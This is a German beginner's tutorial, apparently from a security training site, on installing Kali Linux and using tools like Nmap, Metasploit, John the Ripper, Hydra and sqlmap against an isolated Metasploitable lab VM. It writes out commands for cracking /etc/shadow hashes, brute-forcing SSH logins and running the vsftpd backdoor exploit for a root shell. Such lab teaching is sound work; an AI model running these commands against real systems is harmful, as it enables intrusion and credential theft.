Kali Linux für Anfänger: Installation, Tools und erster Hack

Lerne Kali Linux von Grund auf mit diesem Anfänger-Tutorial. Installiere auf VirtualBox, erkunde die Top-10-Tools und führe deinen ersten Penetrationstest auf Metasploitable durch.
- Offense
- Pentesting
- Skills
- Mindset
- Confidence
TL;DR
Kali Linux ist die Branchen-Standarddistribution für Penetrationstests, vorgeladen mit über 600 Sicherheitstools, die von ethischen Hackern und Sicherheitsfachleuten weltweit genutzt werden. Dieses Tutorial führt Anfänger durch die Installation von Kali auf VirtualBox, die Navigation der Desktop-Umgebung, das Verständnis der 10 wichtigsten Tools und die Durchführung einer ersten praktischen Übung durch das Scannen einer Metasploitable-VM. Keine Linux-Vorerfahrung erforderlich, nur Neugier und die Bereitschaft, durch Tun zu lernen.
Es war die Nacht vor dem ersten Capture-the-Flag-Wettbewerb ihrer Universität, und Priya hatte ein Problem. Sie hatte monatelang Netzwerktheorie studiert, das OSI-Modell auswendig gelernt und konnte Firewall-Regeln aus dem Gedächtnis aufsagen. Aber sie hatte nie tatsächlich ein Netzwerk gescannt, nie ein Paket abgefangen, nie einen verwundbaren Dienst exploitet. Ihr Teamkollege reichte ihr einen USB-Stick und sagte: „Boote davon. Da ist alles drauf, was du brauchst."
Dieser USB-Stick enthielt Kali Linux. Innerhalb von zwei Stunden hatte Priya offene Ports auf dem Übungsserver entdeckt, eine fehlkonfigurierte Webanwendung identifiziert und eine SQL-Injection benutzt, um ihre erste Flag zu erobern. Sie belegte am nächsten Tag den dritten Platz im Wettbewerb. Nicht weil sie über Nacht zur Expertin wurde, sondern weil Kali ihr die Werkzeuge gab, um Theorie in Praxis umzusetzen.
Diese Transformation, von Wissen über Sicherheit zu tatsächlichem Sicherheitshandeln, ist das, was Kali Linux ermöglicht. Und es beginnt mit der Installation.
Was ist Kali Linux und warum es wichtig ist
Kali Linux ist eine Debian-basierte Linux-Distribution, die speziell für Penetrationstests, Sicherheitsforschung und digitale Forensik entwickelt wurde. Gewartet von OffSec (der Organisation hinter der OSCP-Zertifizierung), wird Kali mit über 600 vorinstallierten Sicherheitstools ausgeliefert, organisiert in Kategorien: Informationssammlung, Schwachstellenanalyse, Webanwendungstests, Passwortangriffe, drahtlose Angriffe, Exploitation und Forensik.
Was Kali anders macht als das Installieren einzelner Tools auf Ubuntu oder Fedora, ist die Integration. Jedes Tool ist vorkonfiguriert, Abhängigkeiten sind aufgelöst und das gesamte System ist um den Workflow eines Sicherheitsprofis herum gebaut. Der Kernel enthält Patches für drahtlose Injection. Die Repositories enthalten auf Kompatibilität getestete Tool-Versionen. Die Standard-Benutzerumgebung ist für Penetrationstests konfiguriert, nicht für Desktop-Produktivität.
Über 80 % der professionellen Penetrationstester nutzen Kali als ihre primäre Testdistribution. Wenn Stellenangebote „Umgang mit branchenüblichen Sicherheitstools" erwähnen, beziehen sie sich fast immer auf Tools, die mit Kali ausgeliefert werden. Wenn Zertifizierungsprüfungen wie OSCP dir eine Testumgebung bereitstellen, läuft sie unter Kali.
Das ist kein Spielzeug. Es ist ein professionelles Toolkit. Und es ist komplett kostenlos.
Kali Linux auf VirtualBox installieren
Kali in einer virtuellen Maschine auszuführen ist der sicherste und praktischste Ansatz für Anfänger. Du behältst dein Hauptbetriebssystem intakt, kannst Snapshots vor riskanten Experimenten erstellen und kannst die gesamte Umgebung löschen und neu beginnen, wenn etwas schiefgeht.
Schritt 1: VirtualBox herunterladen und installieren
Lade VirtualBox von virtualbox.org herunter. Wähle das Paket für dein Host-Betriebssystem (Windows, macOS oder Linux) und folge dem Installer. Akzeptiere die Standardeinstellungen. Die Installation dauert etwa fünf Minuten.
Schritt 2: Das Kali-Linux-Image herunterladen
Besuche kali.org/get-kali und lade das vorgefertigte VirtualBox-Image herunter. Es ist eine .ova-Datei, die eine vollständig konfigurierte Kali-Installation enthält. Der Download ist etwa 3,5 GB groß.
Die Verwendung des vorgefertigten Images statt des ISO-Installers spart erheblich Zeit. Das OVA kommt mit bereits installierten VirtualBox Guest Additions, was bedeutet, dass gemeinsame Zwischenablage, Drag-and-Drop-Dateiübertragung und automatische Bildschirmgrößenanpassung sofort funktionieren.
Schritt 3: Das Image importieren
Öffne VirtualBox, klicke auf Datei > Appliance importieren, wähle die heruntergeladene .ova-Datei und klicke auf Importieren. Bevor du die Maschine startest, passe diese Einstellungen an:
System > Motherboard > Base Memory: 4096 MB (minimum 2048)
System > Processor > CPU: 2 cores
Display > Screen > Video Memory: 128 MB
Network > Adapter 1 > Attached to: NAT
Die NAT-Netzwerkeinstellung gibt deiner Kali-VM Internetzugang über deine Host-Maschine, während sie von deinem lokalen Netzwerk isoliert bleibt. Das ist wichtig für sicheres Experimentieren.
Schritt 4: Erster Start
Starte die virtuelle Maschine. Kali startet mit einem Anmeldebildschirm. Die Standard-Anmeldedaten für das vorgefertigte Image sind:
Username: kali
Password: kali
Nach der Anmeldung öffne ein Terminal (das schwarze Rechteck-Symbol in der Taskleiste) und aktualisiere das System:
sudo apt update && sudo apt upgrade -y
Das stellt sicher, dass alle Tools auf dem neuesten Stand sind. Die Aktualisierung kann je nach Internetverbindung 10 bis 20 Minuten dauern.
Den Kali-Desktop navigieren
Kali verwendet standardmäßig die Xfce-Desktop-Umgebung. Sie ist leichtgewichtig und schnell, was wichtig ist, wenn du in einer VM arbeitest. Die wichtigsten Elemente sind:
Das obere Panel enthält das Anwendungsmenü (nach Sicherheitskategorie organisiert), den Arbeitsbereich-Umschalter und die Systemleiste. Das untere Panel zeigt deine offenen Fenster. Der Desktop ist absichtlich minimalistisch, weil die meiste Arbeit im Terminal stattfindet.
Öffne das Anwendungsmenü und erkunde die Kategorien. 01 Information Gathering enthält Aufklärungstools. 05 Password Attacks enthält Cracking-Utilities. 09 Sniffing & Spoofing umfasst Netzwerk-Abfang-Tools. Diese Organisation entspricht den Phasen eines Penetrationstests, von der Aufklärung über die Exploitation bis zum Bericht.
Der Dateimanager, Webbrowser (Firefox ESR) und Texteditor (Mousepad) befinden sich unter der Kategorie Usual Applications. Du wirst Firefox häufig für Webanwendungstests zusammen mit Burp Suite verwenden.
Die Top 10 Kali-Linux-Tools, die jeder Anfänger kennen sollte
Kali wird mit Hunderten von Tools ausgeliefert, aber die Beherrschung dieser zehn deckt die Grundlagen des ethischen Hackings ab. Jedes entspricht einer bestimmten Phase eines Penetrationstests.
1. Nmap (Network Mapper)
Nmap ist das wichtigste Aufklärungstool in der Cybersicherheit. Es entdeckt Hosts in einem Netzwerk, identifiziert offene Ports, erkennt laufende Dienste und ihre Versionen und kann sogar Betriebssysteme identifizieren.
# Basic scan of a target
nmap 192.168.1.100
# Service version detection
nmap -sV 192.168.1.100
# Operating system detection (requires root)
sudo nmap -O 192.168.1.100
# Aggressive scan: OS detection, version, scripts, traceroute
sudo nmap -A 192.168.1.100
Nmap kann alle 65.535 TCP-Ports eines lokalen Netzwerkziels in unter 60 Sekunden im SYN-Scan-Modus (-sS) scannen. Es ist das erste Tool, das du bei jedem Auftrag ausführst, denn du kannst nicht angreifen, was du nicht sehen kannst.
2. Burp Suite (Webanwendungstests)
Burp Suite ist ein abfangender Proxy, der sich zwischen deinen Browser und eine Webanwendung setzt. Er erfasst jede HTTP-Anfrage und -Antwort und ermöglicht es dir, Traffic zu inspizieren, zu modifizieren und wiederzugeben. Die Community Edition ist auf Kali vorinstalliert.
Starte sie über Applications > 03 Web Application Analysis > Burp Suite. Konfiguriere Firefox so, dass der Traffic durch den Burp-Proxy (127.0.0.1:8080) geleitet wird, und jede Webanfrage wird sichtbar und bearbeitbar. So findest du SQL-Injections, Cross-Site-Scripting und Authentifizierungsumgehungen in Webanwendungen.
3. Metasploit Framework
Metasploit ist das weltweit meistgenutzte Exploitation-Framework. Es enthält eine Datenbank bekannter Exploits für Betriebssysteme, Dienste und Anwendungen. Du wählst eine Zielschwachstelle aus, konfigurierst den Exploit, wählst einen Payload (den Code, der nach der Exploitation ausgeführt wird) und führst aus.
# Launch the Metasploit console
msfconsole
# Search for exploits targeting a specific service
search vsftpd
# Use an exploit
use exploit/unix/ftp/vsftpd_234_backdoor
# Set the target
set RHOSTS 192.168.1.100
# Execute
exploit
Metasploit verwandelt theoretische Schwachstellen in demonstrierte Auswirkungen. Wenn ein Kunde fragt „wie schlimm ist diese Schwachstelle wirklich?" liefert Metasploit die Antwort.
4. John the Ripper (Passwort-Cracking)
John the Ripper knackt Passwort-Hashes mit Wörterbuchangriffen, Brute-Force und Hybridmethoden. Wenn du Passwort-Hashes von einem kompromittierten System extrahierst, ermittelt John die ursprünglichen Passwörter.
# Crack Linux shadow file hashes
sudo unshadow /etc/passwd /etc/shadow > hashes.txt
john hashes.txt
# Use a specific wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Show cracked passwords
john --show hashes.txt
Die rockyou.txt-Wortliste wird mit Kali ausgeliefert und enthält über 14 Millionen echte Passwörter aus einem Datenleck von 2009. Sie knackt einen überraschenden Prozentsatz der Passwörter bei den meisten Aufträgen, was genau zeigt, warum starke Passwortrichtlinien wichtig sind.
5. Aircrack-ng (WLAN-Audit)
Aircrack-ng ist eine Suite von Tools zum Testen der Sicherheit drahtloser Netzwerke. Sie erfasst drahtlosen Traffic, deauthentifiziert Clients, um den Handshake zu erzwingen, und knackt WPA/WPA2-Schlüssel durch Wörterbuchangriffe. WLAN-Tests erfordern einen kompatiblen WLAN-Adapter, der Monitor-Modus und Paket-Injection unterstützt.
6. SQLMap (SQL-Injection-Automatisierung)
SQLMap automatisiert die Erkennung und Ausnutzung von SQL-Injection-Schwachstellen. Richte es auf eine URL mit Parametern, und es testet auf Injection, identifiziert den Datenbanktyp und kann Tabellen, Spalten und Daten extrahieren.
# Test a URL parameter for SQL injection
sqlmap -u "http://target.com/page?id=1" --dbs
# Enumerate tables in a specific database
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
7. Hydra (Online-Passwortangriffe)
Hydra führt Online-Brute-Force-Angriffe gegen Netzwerkdienste durch: SSH, FTP, HTTP, SMB, RDP und Dutzende mehr. Anders als John the Ripper, der Offline-Hashes knackt, versucht Hydra tatsächliche Anmeldeversuche gegen aktive Dienste.
# Brute force SSH login
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
# Brute force web login form
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
"/login:user=^USER^&pass=^PASS^:Invalid credentials"
8. Wireshark (Paketanalyse)
Wireshark erfasst und analysiert Netzwerkverkehr auf Paketebene. Es zeigt dir genau, welche Daten das Netzwerk durchlaufen: DNS-Abfragen, HTTP-Anfragen, Authentifizierungsversuche und Dateiübertragungen. In Kali integriert es sich mit anderen Tools, um Sichtbarkeit darüber zu bieten, wie deine Angriffe im Netzwerk aussehen.
9. Nikto (Webserver-Scanner)
Nikto scannt Webserver nach bekannten Schwachstellen, Fehlkonfigurationen und veralteter Software. Es prüft auf gefährliche Dateien, Standardinstallationen und unsichere Server-Header.
# Scan a web server
nikto -h http://192.168.1.100
Nikto ist laut. Es erzeugt Hunderte von Anfragen und wird leicht von Intrusion-Detection-Systemen erkannt. Das macht es ungeeignet für unauffällige Aufträge, aber ausgezeichnet für umfassende Schwachstellenerkennung bei autorisierten Tests.
10. Gobuster (Verzeichnis-Brute-Forcing)
Gobuster entdeckt versteckte Verzeichnisse und Dateien auf Webservern durch Brute-Forcing von Pfaden mit einer Wortliste. Webanwendungen enthalten oft Admin-Panels, Backup-Dateien, Konfigurations-Endpoints und Entwicklungsartefakte, die nicht von der öffentlichen Oberfläche verlinkt sind, aber trotzdem erreichbar bleiben.
# Enumerate directories
gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt
# Enumerate with file extensions
gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
Deine erste praktische Übung: Metasploitable scannen
Theorie bringt dich nur bis zu einem gewissen Punkt. Der schnellste Weg, Kali zu lernen, ist es gegen ein System zu verwenden, das zum Hacken entwickelt wurde. Metasploitable 2 ist eine absichtlich verwundbare Linux-VM, die von Rapid7 erstellt wurde. Sie enthält über 30 fehlkonfigurierte Dienste, schwache Passwörter und ausnutzbare Anwendungen, alles in einer sicheren, isolierten Umgebung.
Metasploitable einrichten
Lade Metasploitable 2 von VulnHub oder SourceForge herunter. Es kommt als .vmdk-Datei. Erstelle eine neue VM in VirtualBox:
- Klicke auf New, nenne sie „Metasploitable", wähle Linux / Ubuntu (64-bit)
- Weise 512 MB RAM zu (sie braucht sehr wenig)
- Wähle Use an existing virtual hard disk file und wähle die heruntergeladene
.vmdk - Ändere vor dem Start den Netzwerkadapter auf Host-only Adapter
Ändere den Netzwerkadapter deiner Kali-VM auf den gleichen Host-only Adapter. Das erstellt ein isoliertes Netzwerk, in dem beide Maschinen kommunizieren können, ohne Metasploitable dem Internet auszusetzen. Verbinde Metasploitable niemals mit einem echten Netzwerk. Die Schwachstellen sind beabsichtigt und schwerwiegend.
Starte Metasploitable (Login: msfadmin / msfadmin) und notiere die IP-Adresse:
ifconfig
Deinen ersten Scan ausführen
Zurück in deinem Kali-Terminal, beginne mit der Host-Erkennung, um zu bestätigen, dass du das Ziel erreichen kannst:
ping -c 4 <metasploitable-ip>
Führe nun einen umfassenden Nmap-Scan durch:
sudo nmap -sV -sC -O <metasploitable-ip>
Die Flags bedeuten: -sV erkennt Dienstversionen, -sC führt Standard-NSE-Skripte für zusätzliche Enumeration aus und -O versucht die Betriebssystemerkennung. Die Ausgabe wird Dutzende offener Ports und laufender Dienste enthüllen:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
23/tcp open telnet Linux telnetd
80/tcp open http Apache httpd 2.2.8
445/tcp open netbios-ssn Samba smbd 3.X
3306/tcp open mysql MySQL 5.0.51a
...
Jeder offene Port stellt eine Angriffsfläche dar. Die vsftpd-Version 2.3.4 ist besonders bemerkenswert, weil sie eine berühmte Backdoor-Schwachstelle enthält. Die veralteten Versionen von SSH, Apache und MySQL haben alle bekannte Exploits.
Die verwundbare Webanwendung erkunden
Öffne Firefox in Kali und navigiere zu http://<metasploitable-ip>. Du wirst eine Seite sehen, die mehrere absichtlich verwundbare Webanwendungen auflistet, darunter DVWA (Damn Vulnerable Web Application), Mutillidae und TWiki.
Führe Nikto gegen den Webserver aus:
nikto -h http://<metasploitable-ip>
Dann benutze Gobuster, um versteckte Verzeichnisse zu finden:
gobuster dir -u http://<metasploitable-ip> -w /usr/share/wordlists/dirb/common.txt
Vergleiche, was Gobuster findet, mit dem, was auf der Hauptseite verlinkt ist. Du wirst wahrscheinlich Verzeichnisse und Dateien entdecken, die nicht öffentlich gelistet waren. Das ist der Kernwert von Verzeichnis-Brute-Forcing: finden, was Entwickler verbergen wollten, aber nicht schützen konnten.
Deinen ersten Exploit versuchen
Mit den Nmap-Ergebnissen, die vsftpd 2.3.4 auf Port 21 zeigen, starte Metasploit:
msfconsole
Suche nach einem bekannten Exploit:
search vsftpd
Metasploit wird das Modul exploit/unix/ftp/vsftpd_234_backdoor zurückgeben. Dieser Exploit zielt auf eine Backdoor ab, die 2011 in den vsftpd-2.3.4-Quellcode eingefügt wurde. Konfiguriere und führe ihn aus:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <metasploitable-ip>
exploit
Wenn der Exploit erfolgreich ist, hast du eine Befehlsshell auf dem Zielsystem. Tippe whoami und du wirst root sehen. Du hast gerade eine vollständige Systemkompromittierung bei deinem ersten Ziel erreicht. Nimm dir einen Moment, um zu würdigen, was passiert ist: Du hast einen Dienst identifiziert, eine bekannte Schwachstelle gefunden, einen Exploit ausgewählt und unautorisierten Zugang erlangt. Das ist es, was Penetrationstester beruflich tun, nur dass sie es mit Genehmigung tun und dann Organisationen helfen, die entdeckten Schwachstellen zu beheben.
Dein Übungslabor aufbauen
Metasploitable ist nur der Anfang. Sobald du dich mit grundlegendem Scannen und Exploitation wohlfühlst, erweitere dein Labor mit zusätzlichen verwundbaren Maschinen von VulnHub. Beginne mit Maschinen, die als „Easy" eingestuft sind, und arbeite dich hoch. Jede Maschine lehrt verschiedene Fähigkeiten: Webanwendungs-Exploitation, Rechteeskalation, Passwort-Cracking oder Netzwerk-Pivoting.
Dein Übungslabor sollte immer auf einem Host-only-Netzwerk isoliert sein. Verbinde absichtlich verwundbare Maschinen niemals mit deinem Heimnetzwerk oder dem Internet. Die Schwachstellen sind echt, und eine exponierte Metasploitable-Maschine wird innerhalb von Minuten von automatisierten Scannern kompromittiert.
Vom Labor zur Karriere
Kali Linux ist ein Mittel, kein Zweck. Die Tools lehren dich offensives Sicherheitsdenken: wie Angreifer Schwachstellen finden, Exploits verketten und sich durch Netzwerke bewegen. Dieses Wissen ist wertvoll, egal ob du auf der offensiven Seite (Penetrationstests, Red Teaming) oder der defensiven Seite (SOC-Analyse, Incident Response, Netzwerksicherheit) landest.
Der Weg von deinem ersten Nmap-Scan zu einer Karriere in der Cybersicherheit folgt einem Muster. Meistere die Grundlagen in deinem Heimlabor. Dokumentiere dein Lernen durch Write-ups und Blogbeiträge. Verfolge strukturiertes Training, das Wissenslücken füllt. Erwirb Zertifizierungen, die deine Fähigkeiten validieren. Die OSCP von OffSec, die Kandidaten in einer 24-stündigen praktischen Prüfung mit Kali-Linux-Tools testet, gilt weithin als Goldstandard für Penetrationstester.
Jeder professionelle Pentester erinnert sich an den Moment, als sein erster Exploit erfolgreich war. Den Moment, als das Terminal root@metasploitable zurückgab. Diese Mischung aus Aufregung und „Moment, das war so einfach?" ist genau das Gefühl, das Menschen antreibt, ihre Karriere dem Finden und Beheben dieser Schwachstellen zu widmen, bevor böswillige Akteure es tun.
Deine Kali-VM wartet. Öffne sie. Scanne etwas. Brich etwas. Dann finde heraus, wie du dich gegen das verteidigen kannst, was du gerade getan hast. So werden Cybersicherheitsfachleute gemacht.
Gründer von Unihackers
Ein Jahrzehnt im Schutz von Fluggesellschaften, SOCs und internationalen Organisationen
Daute hat Unihackers nach einem Jahrzehnt im Schutz von Fluggesellschaften, Managed SOCs und internationalen Organisationen gegründet. Er ist Associate C|CISO und feste Stimme zu KI und Cybersicherheit in internationalen Medien. Silver Winner bei den Cyber Security Excellence Awards 2021. Er unterrichtet so, wie er selbst gerne unterrichtet worden wäre: ohne Lärm, anhand dessen, was Angreifer wirklich tun, und mit Absolventen, die ab Tag eins nützlich sind.
Profil ansehenBereit, Ihre Cybersecurity-Karriere zu starten?
Schließen Sie sich Hunderten von Fachleuten an, die mit unserem praxisorientierten Bootcamp in die Cybersecurity gewechselt sind.

